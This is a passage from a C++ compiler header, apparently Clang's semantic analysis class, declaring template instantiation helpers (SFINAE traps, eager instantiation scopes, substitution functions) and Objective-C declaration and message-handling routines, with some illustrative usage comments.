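//   InstantiatingTemplate Inst(*this, PointOfInstantiation, Entity);
//   if (Inst.isInvalid())
//     return; // instantiation depth exceeded; error already produced
//   if (Inst.isAlreadyInstantiating())
//     return; // re-entrant instantiation of the same specialization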
void pushCodeSynthesisContext(CodeSynthesisContext Ctx);
void popCodeSynthesisContext();
/// Determine whether we are currently performing template instantiation.
bool inTemplateInstantiation() const {
return CodeSynthesisContexts.size() > NonInstantiationEntries;
}
void PrintContextStack() {
if (!CodeSynthesisContexts.empty() &&
CodeSynthesisContexts.size() != LastEmittedCodeSynthesisContextDepth) {
PrintInstantiationStack();
LastEmittedCodeSynthesisContextDepth = CodeSynthesisContexts.size();
}
if (PragmaAttributeCurrentTargetDecl)
PrintPragmaAttributeInstantiationPoint();
}
void PrintInstantiationStack();
void PrintPragmaAttributeInstantiationPoint();
/// Determines whether we are currently in a context where
/// template argument substitution failures are not considered
/// errors.
///
/// \returns An empty \c Optional if we're not in a SFINAE context.
/// Otherwise, contains a pointer that, if non-NULL, points at the nearest
/// template-deduction context object, which can be used to capture
/// diagnostics that will be suppressed.
Optional<sema::TemplateDeductionInfo *> isSFINAEContext() const;
/// Determines whether we are currently in a context that
/// is not evaluated as per C++ [expr] p5.
bool isUnevaluatedContext() const {
assert(!ExprEvalContexts.empty() &&
"Must be in an expression evaluation context");
return ExprEvalContexts.back().isUnevaluated();
}
/// RAII class used to determine whether SFINAE has
/// trapped any errors that occur during template argument
/// deduction.
class SFINAETrap {
Sema &SemaRef;
unsigned PrevSFINAEErrors;
bool PrevInNonInstantiationSFINAEContext;
bool PrevAccessCheckingSFINAE;
bool PrevLastDiagnosticIgnored;
public:
explicit SFINAETrap(Sema &SemaRef, bool AccessCheckingSFINAE = false)
: SemaRef(SemaRef), PrevSFINAEErrors(SemaRef.NumSFINAEErrors),
PrevInNonInstantiationSFINAEContext(
SemaRef.InNonInstantiationSFINAEContext),
PrevAccessCheckingSFINAE(SemaRef.AccessCheckingSFINAE),
PrevLastDiagnosticIgnored(
SemaRef.getDiagnostics().isLastDiagnosticIgnored())
{
if (!SemaRef.isSFINAEContext())
SemaRef.InNonInstantiationSFINAEContext = true;
SemaRef.AccessCheckingSFINAE = AccessCheckingSFINAE;
}
~SFINAETrap() {
SemaRef.NumSFINAEErrors = PrevSFINAEErrors;
SemaRef.InNonInstantiationSFINAEContext
= PrevInNonInstantiationSFINAEContext;
SemaRef.AccessCheckingSFINAE = PrevAccessCheckingSFINAE;
SemaRef.getDiagnostics().setLastDiagnosticIgnored(
PrevLastDiagnosticIgnored);
}
/// Determine whether any SFINAE errors have been trapped.
bool hasErrorOccurred() const {
return SemaRef.NumSFINAEErrors > PrevSFINAEErrors;
}
};
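// Sketch of trapping substitution failures (illustrative; Loc, ESI, Storage,
// and Args are assumptions):
//
//   SFINAETrap Trap(*this);
//   SubstExceptionSpec(Loc, ESI, Storage, Args); // may emit SFINAE errors
//   if (Trap.hasErrorOccurred())
//     return true; // substitution failed silently, as SFINAE requires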
/// RAII class used to indicate that we are performing provisional
/// semantic analysis to determine the validity of a construct, so
/// typo-correction and diagnostics in the immediate context (not within
/// implicitly-instantiated templates) should be suppressed.
class TentativeAnalysisScope {
Sema &SemaRef;
// FIXME: Using a SFINAETrap for this is a hack.
SFINAETrap Trap;
bool PrevDisableTypoCorrection;
public:
explicit TentativeAnalysisScope(Sema &SemaRef)
: SemaRef(SemaRef), Trap(SemaRef, true),
PrevDisableTypoCorrection(SemaRef.DisableTypoCorrection) {
SemaRef.DisableTypoCorrection = true;
}
~TentativeAnalysisScope() {
SemaRef.DisableTypoCorrection = PrevDisableTypoCorrection;
}
};
/// The current instantiation scope used to store local
/// variables.
LocalInstantiationScope *CurrentInstantiationScope;
/// Tracks whether we are in a context where typo correction is
/// disabled.
bool DisableTypoCorrection;
/// The number of typos corrected by CorrectTypo.
unsigned TyposCorrected;
typedef llvm::SmallSet<SourceLocation, 2> SrcLocSet;
typedef llvm::DenseMap<IdentifierInfo *, SrcLocSet> IdentifierSourceLocations;
/// A cache containing identifiers for which typo correction failed and
/// their locations, so that repeated attempts to correct an identifier in a
/// given location are ignored if typo correction already failed for it.
IdentifierSourceLocations TypoCorrectionFailures;
/// Worker object for performing CFG-based warnings.
sema::AnalysisBasedWarnings AnalysisWarnings;
threadSafety::BeforeSet *ThreadSafetyDeclCache;
/// An entity for which implicit template instantiation is required.
///
/// The source location associated with the declaration is the first place in
/// the source code where the declaration was "used". It is not necessarily
/// the point of instantiation (which will be either before or after the
/// namespace-scope declaration that triggered this implicit instantiation),
/// However, it is the location that diagnostics should generally refer to,
/// because users will need to know what code triggered the instantiation.
typedef std::pair<ValueDecl *, SourceLocation> PendingImplicitInstantiation;
/// The queue of implicit template instantiations that are required
/// but have not yet been performed.
std::deque<PendingImplicitInstantiation> PendingInstantiations;
/// Queue of implicit template instantiations that cannot be performed
/// eagerly.
SmallVector<PendingImplicitInstantiation, 1> LateParsedInstantiations;
class GlobalEagerInstantiationScope {
public:
GlobalEagerInstantiationScope(Sema &S, bool Enabled)
: S(S), Enabled(Enabled) {
if (!Enabled) return;
SavedPendingInstantiations.swap(S.PendingInstantiations);
SavedVTableUses.swap(S.VTableUses);
}
void perform() {
if (Enabled) {
S.DefineUsedVTables();
S.PerformPendingInstantiations();
}
}
~GlobalEagerInstantiationScope() {
if (!Enabled) return;
// Restore the set of pending vtables.
assert(S.VTableUses.empty() &&
"VTableUses should be empty before it is discarded.");
S.VTableUses.swap(SavedVTableUses);
// Restore the set of pending implicit instantiations.
assert(S.PendingInstantiations.empty() &&
"PendingInstantiations should be empty before it is discarded.");
S.PendingInstantiations.swap(SavedPendingInstantiations);
}
private:
Sema &S;
SmallVector<VTableUse, 16> SavedVTableUses;
std::deque<PendingImplicitInstantiation> SavedPendingInstantiations;
bool Enabled;
};
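// Typical lifetime, sketched for illustration: collect instantiations while
// the scope is active, then flush them explicitly before it unwinds.
//
//   {
//     GlobalEagerInstantiationScope GlobalInstantiations(*this,
//                                                        /*Enabled=*/true);
//     // ... code that enqueues PendingInstantiations and VTableUses ...
//     GlobalInstantiations.perform(); // define vtables, run instantiations
//   } // saved queues are swapped back on destruction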
/// The queue of implicit template instantiations that are required
/// and must be performed within the current local scope.
///
/// This queue is only used for member functions of local classes in
/// templates, which must be instantiated in the same scope as their
/// enclosing function, so that they can reference function-local
/// types, static variables, enumerators, etc.
std::deque<PendingImplicitInstantiation> PendingLocalImplicitInstantiations;
class LocalEagerInstantiationScope {
public:
LocalEagerInstantiationScope(Sema &S) : S(S) {
SavedPendingLocalImplicitInstantiations.swap(
S.PendingLocalImplicitInstantiations);
}
void perform() { S.PerformPendingInstantiations(/*LocalOnly=*/true); }
~LocalEagerInstantiationScope() {
assert(S.PendingLocalImplicitInstantiations.empty() &&
"there shouldn't be any pending local implicit instantiations");
SavedPendingLocalImplicitInstantiations.swap(
S.PendingLocalImplicitInstantiations);
}
private:
Sema &S;
std::deque<PendingImplicitInstantiation>
SavedPendingLocalImplicitInstantiations;
};
/// A helper class for building up ExtParameterInfos.
class ExtParameterInfoBuilder {
SmallVector<FunctionProtoType::ExtParameterInfo, 16> Infos;
bool HasInteresting = false;
public:
/// Set the ExtParameterInfo for the parameter at the given index.
void set(unsigned index, FunctionProtoType::ExtParameterInfo info) {
assert(Infos.size() <= index);
Infos.resize(index);
Infos.push_back(info);
if (!HasInteresting)
HasInteresting = (info != FunctionProtoType::ExtParameterInfo());
}
/// Return a pointer (suitable for setting in an ExtProtoInfo) to the
/// ExtParameterInfo array we've built up.
const FunctionProtoType::ExtParameterInfo *
getPointerOrNull(unsigned numParams) {
if (!HasInteresting) return nullptr;
Infos.resize(numParams);
return Infos.data();
}
};
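// Builder usage sketch (illustrative; EPI and NumParams are assumptions, and
// withIsNoEscape is one of ExtParameterInfo's with-style setters): record
// entries in increasing index order, then hand the array to an ExtProtoInfo
// when at least one entry is non-trivial.
//
//   ExtParameterInfoBuilder ParamInfos;
//   ParamInfos.set(2, FunctionProtoType::ExtParameterInfo()
//                         .withIsNoEscape(true));
//   EPI.ExtParameterInfos = ParamInfos.getPointerOrNull(NumParams);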
void PerformPendingInstantiations(bool LocalOnly = false);
TypeSourceInfo *SubstType(TypeSourceInfo *T,
const MultiLevelTemplateArgumentList &TemplateArgs,
SourceLocation Loc, DeclarationName Entity,
bool AllowDeducedTST = false);
QualType SubstType(QualType T,
const MultiLevelTemplateArgumentList &TemplateArgs,
SourceLocation Loc, DeclarationName Entity);
TypeSourceInfo *SubstType(TypeLoc TL,
const MultiLevelTemplateArgumentList &TemplateArgs,
SourceLocation Loc, DeclarationName Entity);
TypeSourceInfo *SubstFunctionDeclType(TypeSourceInfo *T,
const MultiLevelTemplateArgumentList &TemplateArgs,
SourceLocation Loc,
DeclarationName Entity,
CXXRecordDecl *ThisContext,
Qualifiers ThisTypeQuals);
void SubstExceptionSpec(FunctionDecl *New, const FunctionProtoType *Proto,
const MultiLevelTemplateArgumentList &Args);
bool SubstExceptionSpec(SourceLocation Loc,
FunctionProtoType::ExceptionSpecInfo &ESI,
SmallVectorImpl<QualType> &ExceptionStorage,
const MultiLevelTemplateArgumentList &Args);
ParmVarDecl *SubstParmVarDecl(ParmVarDecl *D,
const MultiLevelTemplateArgumentList &TemplateArgs,
int indexAdjustment,
Optional<unsigned> NumExpansions,
bool ExpectParameterPack);
bool SubstParmTypes(SourceLocation Loc, ArrayRef<ParmVarDecl *> Params,
const FunctionProtoType::ExtParameterInfo *ExtParamInfos,
const MultiLevelTemplateArgumentList &TemplateArgs,
SmallVectorImpl<QualType> &ParamTypes,
SmallVectorImpl<ParmVarDecl *> *OutParams,
ExtParameterInfoBuilder &ParamInfos);
ExprResult SubstExpr(Expr *E,
const MultiLevelTemplateArgumentList &TemplateArgs);
/// Substitute the given template arguments into a list of
/// expressions, expanding pack expansions if required.
///
/// \param Exprs The list of expressions to substitute into.
///
/// \param IsCall Whether this is some form of call, in which case
/// default arguments will be dropped.
///
/// \param TemplateArgs The set of template arguments to substitute.
///
/// \param Outputs Will receive all of the substituted arguments.
///
/// \returns true if an error occurred, false otherwise.
bool SubstExprs(ArrayRef<Expr *> Exprs, bool IsCall,
const MultiLevelTemplateArgumentList &TemplateArgs,
SmallVectorImpl<Expr *> &Outputs);
StmtResult SubstStmt(Stmt *S,
const MultiLevelTemplateArgumentList &TemplateArgs);
TemplateParameterList *
SubstTemplateParams(TemplateParameterList *Params, DeclContext *Owner,
const MultiLevelTemplateArgumentList &TemplateArgs);
bool
SubstTemplateArguments(ArrayRef<TemplateArgumentLoc> Args,
const MultiLevelTemplateArgumentList &TemplateArgs,
TemplateArgumentListInfo &Outputs);
Decl *SubstDecl(Decl *D, DeclContext *Owner,
const MultiLevelTemplateArgumentList &TemplateArgs);
/// Substitute the name and return type of a defaulted 'operator<=>' to form
/// an implicit 'operator=='.
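///
/// For example (illustrative):
/// \code
///   struct X { auto operator<=>(const X &) const = default; };
///   // An implicit 'bool operator==(const X &) const' is synthesized
///   // from the defaulted three-way comparison.
/// \endcode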
FunctionDecl *SubstSpaceshipAsEqualEqual(CXXRecordDecl *RD,
FunctionDecl *Spaceship);
ExprResult SubstInitializer(Expr *E,
const MultiLevelTemplateArgumentList &TemplateArgs,
bool CXXDirectInit);
bool
SubstBaseSpecifiers(CXXRecordDecl *Instantiation,
CXXRecordDecl *Pattern,
const MultiLevelTemplateArgumentList &TemplateArgs);
bool
InstantiateClass(SourceLocation PointOfInstantiation,
CXXRecordDecl *Instantiation, CXXRecordDecl *Pattern,
const MultiLevelTemplateArgumentList &TemplateArgs,
TemplateSpecializationKind TSK,
bool Complain = true);
bool InstantiateEnum(SourceLocation PointOfInstantiation,
EnumDecl *Instantiation, EnumDecl *Pattern,
const MultiLevelTemplateArgumentList &TemplateArgs,
TemplateSpecializationKind TSK);
bool InstantiateInClassInitializer(
SourceLocation PointOfInstantiation, FieldDecl *Instantiation,
FieldDecl *Pattern, const MultiLevelTemplateArgumentList &TemplateArgs);
struct LateInstantiatedAttribute {
const Attr *TmplAttr;
LocalInstantiationScope *Scope;
Decl *NewDecl;
LateInstantiatedAttribute(const Attr *A, LocalInstantiationScope *S,
Decl *D)
: TmplAttr(A), Scope(S), NewDecl(D)
{ }
};
typedef SmallVector<LateInstantiatedAttribute, 16> LateInstantiatedAttrVec;
void InstantiateAttrs(const MultiLevelTemplateArgumentList &TemplateArgs,
const Decl *Pattern, Decl *Inst,
LateInstantiatedAttrVec *LateAttrs = nullptr,
LocalInstantiationScope *OuterMostScope = nullptr);
void
InstantiateAttrsForDecl(const MultiLevelTemplateArgumentList &TemplateArgs,
const Decl *Pattern, Decl *Inst,
LateInstantiatedAttrVec *LateAttrs = nullptr,
LocalInstantiationScope *OuterMostScope = nullptr);
bool usesPartialOrExplicitSpecialization(
SourceLocation Loc, ClassTemplateSpecializationDecl *ClassTemplateSpec);
bool
InstantiateClassTemplateSpecialization(SourceLocation PointOfInstantiation,
ClassTemplateSpecializationDecl *ClassTemplateSpec,
TemplateSpecializationKind TSK,
bool Complain = true);
void InstantiateClassMembers(SourceLocation PointOfInstantiation,
CXXRecordDecl *Instantiation,
const MultiLevelTemplateArgumentList &TemplateArgs,
TemplateSpecializationKind TSK);
void InstantiateClassTemplateSpecializationMembers(
SourceLocation PointOfInstantiation,
ClassTemplateSpecializationDecl *ClassTemplateSpec,
TemplateSpecializationKind TSK);
NestedNameSpecifierLoc
SubstNestedNameSpecifierLoc(NestedNameSpecifierLoc NNS,
const MultiLevelTemplateArgumentList &TemplateArgs);
DeclarationNameInfo
SubstDeclarationNameInfo(const DeclarationNameInfo &NameInfo,
const MultiLevelTemplateArgumentList &TemplateArgs);
TemplateName
SubstTemplateName(NestedNameSpecifierLoc QualifierLoc, TemplateName Name,
SourceLocation Loc,
const MultiLevelTemplateArgumentList &TemplateArgs);
bool Subst(const TemplateArgumentLoc *Args, unsigned NumArgs,
TemplateArgumentListInfo &Result,
const MultiLevelTemplateArgumentList &TemplateArgs);
void InstantiateExceptionSpec(SourceLocation PointOfInstantiation,
FunctionDecl *Function);
bool CheckInstantiatedFunctionTemplateConstraints(
SourceLocation PointOfInstantiation, FunctionDecl *Decl,
ArrayRef<TemplateArgument> TemplateArgs,
ConstraintSatisfaction &Satisfaction);
FunctionDecl *InstantiateFunctionDeclaration(FunctionTemplateDecl *FTD,
const TemplateArgumentList *Args,
SourceLocation Loc);
void InstantiateFunctionDefinition(SourceLocation PointOfInstantiation,
FunctionDecl *Function,
bool Recursive = false,
bool DefinitionRequired = false,
bool AtEndOfTU = false);
VarTemplateSpecializationDecl *BuildVarTemplateInstantiation(
VarTemplateDecl *VarTemplate, VarDecl *FromVar,
const TemplateArgumentList &TemplateArgList,
const TemplateArgumentListInfo &TemplateArgsInfo,
SmallVectorImpl<TemplateArgument> &Converted,
SourceLocation PointOfInstantiation, void *InsertPos,
LateInstantiatedAttrVec *LateAttrs = nullptr,
LocalInstantiationScope *StartingScope = nullptr);
VarTemplateSpecializationDecl *CompleteVarTemplateSpecializationDecl(
VarTemplateSpecializationDecl *VarSpec, VarDecl *PatternDecl,
const MultiLevelTemplateArgumentList &TemplateArgs);
void
BuildVariableInstantiation(VarDecl *NewVar, VarDecl *OldVar,
const MultiLevelTemplateArgumentList &TemplateArgs,
LateInstantiatedAttrVec *LateAttrs,
DeclContext *Owner,
LocalInstantiationScope *StartingScope,
bool InstantiatingVarTemplate = false,
VarTemplateSpecializationDecl *PrevVTSD = nullptr);
VarDecl *getVarTemplateSpecialization(
VarTemplateDecl *VarTempl, const TemplateArgumentListInfo *TemplateArgs,
const DeclarationNameInfo &MemberNameInfo, SourceLocation TemplateKWLoc);
void InstantiateVariableInitializer(
VarDecl *Var, VarDecl *OldVar,
const MultiLevelTemplateArgumentList &TemplateArgs);
void InstantiateVariableDefinition(SourceLocation PointOfInstantiation,
VarDecl *Var, bool Recursive = false,
bool DefinitionRequired = false,
bool AtEndOfTU = false);
void InstantiateMemInitializers(CXXConstructorDecl *New,
const CXXConstructorDecl *Tmpl,
const MultiLevelTemplateArgumentList &TemplateArgs);
NamedDecl *FindInstantiatedDecl(SourceLocation Loc, NamedDecl *D,
const MultiLevelTemplateArgumentList &TemplateArgs,
bool FindingInstantiatedContext = false);
DeclContext *FindInstantiatedContext(SourceLocation Loc, DeclContext *DC,
const MultiLevelTemplateArgumentList &TemplateArgs);
// Objective-C declarations.
enum ObjCContainerKind {
OCK_None = -1,
OCK_Interface = 0,
OCK_Protocol,
OCK_Category,
OCK_ClassExtension,
OCK_Implementation,
OCK_CategoryImplementation
};
ObjCContainerKind getObjCContainerKind() const;
DeclResult actOnObjCTypeParam(Scope *S,
ObjCTypeParamVariance variance,
SourceLocation varianceLoc,
unsigned index,
IdentifierInfo *paramName,
SourceLocation paramLoc,
SourceLocation colonLoc,
ParsedType typeBound);
ObjCTypeParamList *actOnObjCTypeParamList(Scope *S, SourceLocation lAngleLoc,
ArrayRef<Decl *> typeParams,
SourceLocation rAngleLoc);
void popObjCTypeParamList(Scope *S, ObjCTypeParamList *typeParamList);
Decl *ActOnStartClassInterface(
Scope *S, SourceLocation AtInterfaceLoc, IdentifierInfo *ClassName,
SourceLocation ClassLoc, ObjCTypeParamList *typeParamList,
IdentifierInfo *SuperName, SourceLocation SuperLoc,
ArrayRef<ParsedType> SuperTypeArgs, SourceRange SuperTypeArgsRange,
Decl *const *ProtoRefs, unsigned NumProtoRefs,
const SourceLocation *ProtoLocs, SourceLocation EndProtoLoc,
const ParsedAttributesView &AttrList);
void ActOnSuperClassOfClassInterface(Scope *S,
SourceLocation AtInterfaceLoc,
ObjCInterfaceDecl *IDecl,
IdentifierInfo *ClassName,
SourceLocation ClassLoc,
IdentifierInfo *SuperName,
SourceLocation SuperLoc,
ArrayRef<ParsedType> SuperTypeArgs,
SourceRange SuperTypeArgsRange);
void ActOnTypedefedProtocols(SmallVectorImpl<Decl *> &ProtocolRefs,
SmallVectorImpl<SourceLocation> &ProtocolLocs,
IdentifierInfo *SuperName,
SourceLocation SuperLoc);
Decl *ActOnCompatibilityAlias(
SourceLocation AtCompatibilityAliasLoc,
IdentifierInfo *AliasName, SourceLocation AliasLocation,
IdentifierInfo *ClassName, SourceLocation ClassLocation);
bool CheckForwardProtocolDeclarationForCircularDependency(
IdentifierInfo *PName,
SourceLocation &PLoc, SourceLocation PrevLoc,
const ObjCList<ObjCProtocolDecl> &PList);
Decl *ActOnStartProtocolInterface(
SourceLocation AtProtoInterfaceLoc, IdentifierInfo *ProtocolName,
SourceLocation ProtocolLoc, Decl *const *ProtoRefNames,
unsigned NumProtoRefs, const SourceLocation *ProtoLocs,
SourceLocation EndProtoLoc, const ParsedAttributesView &AttrList);
Decl *ActOnStartCategoryInterface(
SourceLocation AtInterfaceLoc, IdentifierInfo *ClassName,
SourceLocation ClassLoc, ObjCTypeParamList *typeParamList,
IdentifierInfo *CategoryName, SourceLocation CategoryLoc,
Decl *const *ProtoRefs, unsigned NumProtoRefs,
const SourceLocation *ProtoLocs, SourceLocation EndProtoLoc,
const ParsedAttributesView &AttrList);
Decl *ActOnStartClassImplementation(SourceLocation AtClassImplLoc,
IdentifierInfo *ClassName,
SourceLocation ClassLoc,
IdentifierInfo *SuperClassname,
SourceLocation SuperClassLoc,
const ParsedAttributesView &AttrList);
Decl *ActOnStartCategoryImplementation(SourceLocation AtCatImplLoc,
IdentifierInfo *ClassName,
SourceLocation ClassLoc,
IdentifierInfo *CatName,
SourceLocation CatLoc,
const ParsedAttributesView &AttrList);
DeclGroupPtrTy ActOnFinishObjCImplementation(Decl *ObjCImpDecl,
ArrayRef<Decl *> Decls);
DeclGroupPtrTy ActOnForwardClassDeclaration(SourceLocation Loc,
IdentifierInfo **IdentList,
SourceLocation *IdentLocs,
ArrayRef<ObjCTypeParamList *> TypeParamLists,
unsigned NumElts);
DeclGroupPtrTy
ActOnForwardProtocolDeclaration(SourceLocation AtProtocolLoc,
ArrayRef<IdentifierLocPair> IdentList,
const ParsedAttributesView &attrList);
void FindProtocolDeclaration(bool WarnOnDeclarations, bool ForObjCContainer,
ArrayRef<IdentifierLocPair> ProtocolId,
SmallVectorImpl<Decl *> &Protocols);
void DiagnoseTypeArgsAndProtocols(IdentifierInfo *ProtocolId,
SourceLocation ProtocolLoc,
IdentifierInfo *TypeArgId,
SourceLocation TypeArgLoc,
bool SelectProtocolFirst = false);
/// Given a list of identifiers (and their locations), resolve the
/// names to either Objective-C protocol qualifiers or type
/// arguments, as appropriate.
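///
/// For example, in 'NSArray<NSCopying>' the name in angle brackets
/// resolves to a protocol qualifier, while in 'NSArray<NSString *>' the
/// angle brackets carry type arguments.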
void actOnObjCTypeArgsOrProtocolQualifiers(
Scope *S,
ParsedType baseType,
SourceLocation lAngleLoc,
ArrayRef<IdentifierInfo *> identifiers,
ArrayRef<SourceLocation> identifierLocs,
SourceLocation rAngleLoc,
SourceLocation &typeArgsLAngleLoc,
SmallVectorImpl<ParsedType> &typeArgs,
SourceLocation &typeArgsRAngleLoc,
SourceLocation &protocolLAngleLoc,
SmallVectorImpl<Decl *> &protocols,
SourceLocation &protocolRAngleLoc,
bool warnOnIncompleteProtocols);
/// Build an Objective-C protocol-qualified 'id' type where no
/// base type was specified.
TypeResult actOnObjCProtocolQualifierType(
SourceLocation lAngleLoc,
ArrayRef<Decl *> protocols,
ArrayRef<SourceLocation> protocolLocs,
SourceLocation rAngleLoc);
/// Build a specialized and/or protocol-qualified Objective-C type.
TypeResult actOnObjCTypeArgsAndProtocolQualifiers(
Scope *S,
SourceLocation Loc,
ParsedType BaseType,
SourceLocation TypeArgsLAngleLoc,
ArrayRef<ParsedType> TypeArgs,
SourceLocation TypeArgsRAngleLoc,
SourceLocation ProtocolLAngleLoc,
ArrayRef<Decl *> Protocols,
ArrayRef<SourceLocation> ProtocolLocs,
SourceLocation ProtocolRAngleLoc);
/// Build an Objective-C type parameter type.
QualType BuildObjCTypeParamType(const ObjCTypeParamDecl *Decl,
SourceLocation ProtocolLAngleLoc,
ArrayRef<ObjCProtocolDecl *> Protocols,
ArrayRef<SourceLocation> ProtocolLocs,
SourceLocation ProtocolRAngleLoc,
bool FailOnError = false);
/// Build an Objective-C object pointer type.
QualType BuildObjCObjectType(QualType BaseType,
SourceLocation Loc,
SourceLocation TypeArgsLAngleLoc,
ArrayRef<TypeSourceInfo *> TypeArgs,
SourceLocation TypeArgsRAngleLoc,
SourceLocation ProtocolLAngleLoc,
ArrayRef<ObjCProtocolDecl *> Protocols,
ArrayRef<SourceLocation> ProtocolLocs,
SourceLocation ProtocolRAngleLoc,
bool FailOnError = false);
/// Ensure attributes are consistent with type.
/// \param [in, out] Attributes The attributes to check; they will
/// be modified to be consistent with the type of \p PropertyPtrTy.
void CheckObjCPropertyAttributes(Decl *PropertyPtrTy,
SourceLocation Loc,
unsigned &Attributes,
bool propertyInPrimaryClass);
/// Process the specified property declaration and create decls for the
/// setters and getters as needed.
/// \param property The property declaration being processed
void ProcessPropertyDecl(ObjCPropertyDecl *property);
void DiagnosePropertyMismatch(ObjCPropertyDecl *Property,
ObjCPropertyDecl *SuperProperty,
const IdentifierInfo *Name,
bool OverridingProtocolProperty);
void DiagnoseClassExtensionDupMethods(ObjCCategoryDecl *CAT,
ObjCInterfaceDecl *ID);
Decl *ActOnAtEnd(Scope *S, SourceRange AtEnd,
ArrayRef<Decl *> allMethods = None,
ArrayRef<DeclGroupPtrTy> allTUVars = None);
Decl *ActOnProperty(Scope *S, SourceLocation AtLoc,
SourceLocation LParenLoc,
FieldDeclarator &FD, ObjCDeclSpec &ODS,
Selector GetterSel, Selector SetterSel,
tok::ObjCKeywordKind MethodImplKind,
DeclContext *lexicalDC = nullptr);
Decl *ActOnPropertyImplDecl(Scope *S,
SourceLocation AtLoc,
SourceLocation PropertyLoc,
bool ImplKind,
IdentifierInfo *PropertyId,
IdentifierInfo *PropertyIvar,
SourceLocation PropertyIvarLoc,
ObjCPropertyQueryKind QueryKind);
enum ObjCSpecialMethodKind {
OSMK_None,
OSMK_Alloc,
OSMK_New,
OSMK_Copy,
OSMK_RetainingInit,
OSMK_NonRetainingInit
};
struct ObjCArgInfo {
IdentifierInfo *Name;
SourceLocation NameLoc;
// The Type is null if no type was specified, and the DeclSpec is invalid
// in this case.
ParsedType Type;
ObjCDeclSpec DeclSpec;
/// ArgAttrs - Attribute list for this argument.
ParsedAttributesView ArgAttrs;
};
Decl *ActOnMethodDeclaration(
Scope *S,
SourceLocation BeginLoc, // location of the + or -.
SourceLocation EndLoc, // location of the ; or {.
tok::TokenKind MethodType, ObjCDeclSpec &ReturnQT, ParsedType ReturnType,
ArrayRef<SourceLocation> SelectorLocs, Selector Sel,
// optional arguments. The number of types/arguments is obtained
// from Sel.getNumArgs().
ObjCArgInfo *ArgInfo, DeclaratorChunk::ParamInfo *CParamInfo,
unsigned CNumArgs, // c-style args
const ParsedAttributesView &AttrList, tok::ObjCKeywordKind MethodImplKind,
bool isVariadic, bool MethodDefinition);
ObjCMethodDecl *LookupMethodInQualifiedType(Selector Sel,
const ObjCObjectPointerType *OPT,
bool IsInstance);
ObjCMethodDecl *LookupMethodInObjectType(Selector Sel, QualType Ty,
bool IsInstance);
bool CheckARCMethodDecl(ObjCMethodDecl *method);
bool inferObjCARCLifetime(ValueDecl *decl);
void deduceOpenCLAddressSpace(ValueDecl *decl);
ExprResult
HandleExprPropertyRefExpr(const ObjCObjectPointerType *OPT,
Expr *BaseExpr,
SourceLocation OpLoc,
DeclarationName MemberName,
SourceLocation MemberLoc,
SourceLocation SuperLoc, QualType SuperType,
bool Super);
ExprResult
ActOnClassPropertyRefExpr(IdentifierInfo &receiverName,
IdentifierInfo &propertyName,
SourceLocation receiverNameLoc,
SourceLocation propertyNameLoc);
ObjCMethodDecl *tryCaptureObjCSelf(SourceLocation Loc);
/// Describes the kind of message expression indicated by a message
/// send that starts with an identifier.
enum ObjCMessageKind {
/// The message is sent to 'super'.
ObjCSuperMessage,
/// The message is an instance message.
ObjCInstanceMessage,
/// The message is a class message, and the identifier is a type
/// name.
ObjCClassMessage
};
ObjCMessageKind getObjCMessageKind(Scope *S,
IdentifierInfo *Name,
SourceLocation NameLoc,
bool IsSuper,
bool HasTrailingDot,
ParsedType &ReceiverType);
ExprResult ActOnSuperMessage(Scope *S, SourceLocation SuperLoc,
Selector Sel,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args);
ExprResult BuildClassMessage(TypeSourceInfo *ReceiverTypeInfo,
QualType ReceiverType,
SourceLocation SuperLoc,
Selector Sel,
ObjCMethodDecl *Method,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args,
bool isImplicit = false);
ExprResult BuildClassMessageImplicit(QualType ReceiverType,
bool isSuperReceiver,
SourceLocation Loc,
Selector Sel,
ObjCMethodDecl *Method,
MultiExprArg Args);
ExprResult ActOnClassMessage(Scope *S,
ParsedType Receiver,
Selector Sel,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args);
ExprResult BuildInstanceMessage(Expr *Receiver,
QualType ReceiverType,
SourceLocation SuperLoc,
Selector Sel,
ObjCMethodDecl *Method,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args,
bool isImplicit = false);
ExprResult BuildInstanceMessageImplicit(Expr *Receiver,
QualType ReceiverType,
SourceLocation Loc,
Selector Sel,
ObjCMethodDecl *Method,
MultiExprArg Args);
ExprResult ActOnInstanceMessage(Scope *S,
Expr *Receiver,
Selector Sel,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args);
ExprResult BuildObjCBridgedCast(SourceLocation LParenLoc,
ObjCBridgeCastKind Kind,
SourceLocation BridgeKeywordLoc,
TypeSourceInfo *TSInfo,
Expr *SubExpr);
ExprResult ActOnObjCBridgedCast(Scope *S,
SourceLocation LParenLoc,
ObjCBridgeCastKind Kind,
SourceLocation BridgeKeywordLoc,
ParsedType Type,
SourceLocation RParenLoc,
Expr *SubExpr);
void CheckTollFreeBridgeCast(QualType castType, Expr *castExpr);
void CheckObjCBridgeRelatedCast(QualType castType, Expr *castExpr);
bool CheckTollFreeBridgeStaticCast(QualType castType, Expr *castExpr,
CastKind &Kind);
bool checkObjCBridgeRelatedComponents(SourceLocation Loc,
QualType DestType, QualType SrcType,
ObjCInterfaceDecl *&RelatedClass,
ObjCMethodDecl *&ClassMethod,
ObjCMethodDecl *&InstanceMethod,
TypedefNameDecl *&TDNDecl,
bool CfToNs, bool Diagnose = true);
bool CheckObjCBridgeRelatedConversions(SourceLocation Loc,
QualType DestType, QualType SrcType,
Expr *&SrcExpr, bool Diagnose = true);
bool CheckConversionToObjCLiteral(QualType DstType, Expr *&SrcExpr,
bool Diagnose = true);
bool checkInitMethod(ObjCMethodDecl *method, QualType receiverTypeIfCall);
/// Check whether the given new method is a valid override of the
/// given overridden method, and set any properties that should be inherited.
void CheckObjCMethodOverride(ObjCMethodDecl *NewMethod,
const ObjCMethodDecl *Overridden);
/// Describes the compatibility of a result type with its method.
enum ResultTypeCompatibilityKind {
RTC_Compatible,
RTC_Incompatible,
RTC_Unknown
};
/// Check whether the declared result type of the given Objective-C
/// method declaration is compatible with the method's class.
ResultTypeCompatibilityKind
checkRelatedResultTypeCompatibility(const ObjCMethodDecl *Method,
const ObjCInterfaceDecl *CurrentClass);
void CheckObjCMethodDirectOverrides(ObjCMethodDecl *method,
ObjCMethodDecl *overridden);
